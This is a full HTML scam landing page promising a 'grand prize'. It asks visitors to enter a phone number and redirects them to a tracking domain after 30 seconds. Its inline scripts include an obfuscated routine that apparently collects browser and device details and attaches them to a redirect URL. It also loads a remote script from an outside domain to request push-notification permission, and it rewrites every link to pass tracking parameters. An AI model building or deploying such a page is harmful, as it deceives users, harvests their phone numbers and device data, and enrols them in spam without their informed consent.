<!DOCTYPE html>
<html class="no-js" lang="en">

<head>
    <base href="">

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="">
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Place favicon.ico in the root directory -->
    <style type="text/css">
        body {
            margin: 0;
            padding: 0;
            width: 100%;
            font-family: Arial, Helvetica, sans-serif;
            font-size: 12px;
            color: #333333;
            background-color: #ffffff;
        }

        a {
            text-decoration: none;
            color: #333333;
        }

        .clear {
            clear: both;
        }

        .title {
            padding: 20px 5px;
            color: #0080c8;
            font-size: 25px;
            line-height: 28px;
            font-weight: bold;
        }

        .loadbar {
            padding: 0px 2px 5px 2px;
        }

        .imgloadbar {
            max-width: 300px;
            width: 100%;
        }

        .txt {
            padding: 0px 0px 20px 0px;
            font-size: 15px;
            line-height: 19px;
        }

        .desript {
            padding: 20px 0px 5px 0px;
            max-width: 450px;
        }

        .s1,
        .s2 {
            padding: 0px 5px 10px 5px;
            font-size: 18px;
            line-height: 20px;
            text-align: left;
        }

        .btnwrap {
            margin: 10px 0px;
        }

        .bluebtn {
            max-width: 100px;
            width: 100%;
            padding: 8px 0px;
            color: #fff;
            font-size: 20px;
            font-weight: bold;
            text-align: center;
            text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.20);
            -moz-text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.20);
            -o-text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.20);
            -ms-text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.20);
            -khtml-text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.20);
            border: 1px solid #296283;
            border-radius: 5px;
            -moz-border-radius: 5px;
            -webkit-border-radius: 5px;
            -khtml-border-radius: 5px;
            background: #3f83b7;
            background: -moz-linear-gradient(top, #3f83b7 0%, #4b97d1 100%);
            background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #3f83b7), color-stop(100%, #4b97d1));
            background: -webkit-linear-gradient(top, #3f83b7 0%, #4b97d1 100%);
            background: -o-linear-gradient(top, #3f83b7 0%, #4b97d1 100%);
            background: -ms-linear-gradient(top, #3f83b7 0%, #4b97d1 100%);
            background: linear-gradient(to bottom, #3f83b7 0%, #4b97d1 100%);
        }

        .bluebtn:hover {
            background: #4991c8;
            background: -moz-linear-gradient(top, #4b97d1 0%, #3f83b7 100%);
            background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #4b97d1), color-stop(100%, #3f83b7));
            background: -webkit-linear-gradient(top, #4b97d1 0%, #3f83b7 100%);
            background: -o-linear-gradient(top, #4b97d1 0%, #3f83b7 100%);
            background: -ms-linear-gradient(top, #4b97d1 0%, #3f83b7 100%);
            background: linear-gradient(to bottom, #4b97d1 0%, #3f83b7 100%);
        }

        .bluebtn:active {
            position: relative;
            top: 1px;
        }
    </style>
    <meta http-equiv="refresh" content="30; url=https://33uge7.mcgo2.com/click">
    <title>The grand prize is coming</title>
</head>

<body>
    <center>
        <div class="container">
            <div class="title">
                Loading......
            </div>

            <div class="loadbar">
                <img class="imgloadbar" src="loadbar.gif">
            </div>

            <div class="desript">
                It's that easy to win rewards!
            </div>

            <div class="desript">
                <div class="s1">Step 1: Click OK</div>
                <div class="s2">Step 2: Enter your phone number</div>
            </div>

            <div class="btnwrap">
			<div ><a href="https://33uge7.mcgo2.com/click" class="bluebtn mainButton" style="padding: 8px 16px;">OK </a></div>
                
            </div>
        </div>
    </center>
    <div id="timer" style="display: none;"></div>


    </script>
    <script type="text/javascript">
        // aftr 30sec go to link url page //
        window.onload = function () {
            var sec = 30;
            setInterval(function () {
                var a = new Date();
                document.getElementById("timer").innerHTML = sec;
                sec--;
                if (sec == 00) {
                    window.location.href = 'https://33uge7.mcgo2.com/click';
                }
            }, 1000);
        }
        // end //
    </script>
    <script>
  var cta = 'mainButton';
  var urlParams = new URLSearchParams(window.location.search);
  var back = 'https://33uge7.mcgo2.com/visit/a6749d4d-b2d1-4d46-9900-0d339210390c?sc=bbr_2&'+urlParams.toString()
  var under = 'https://33uge7.mcgo2.com/click?sc=u&'+urlParams.toString()
	
  var aElements = document.getElementsByTagName('a');
  console.log(aElements)
  for (var i = 0; i < aElements.length; i++) {
	var aElement = aElements[i];
		var href = aElement.getAttribute('href');
		if (!aElement.hasAttribute('href')) {
			continue;  // 跳过没有 href 属性的 <a> 标签
		}
		// 在 URL 的查询字符串之前添加一个 "?"
		if (urlParams.toString()) {
			href += (href.includes('?') ? '&' : '?') + urlParams.toString();
		}
		aElement.setAttribute('href', href);
    }
</script>
<script src="script.js"></script>

<script>
	var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]);
	var s = document.createElement('script');
	s.src='//beevakum.net/452/21aa4/mw.min.js?z=8060728'+'&sw=/sw-check-permissions-66175.js';
	s.onload = function(result) {
		switch (result) {
			case 'onPermissionDefault':break;
			case 'onPermissionAllowed':break;
			case 'onPermissionDenied':break;
			case 'onAlreadySubscribed':break;
			case 'onNotificationUnsupported':break;
		}
	};
	document.head.appendChild(s);
</script>


</body>

</html>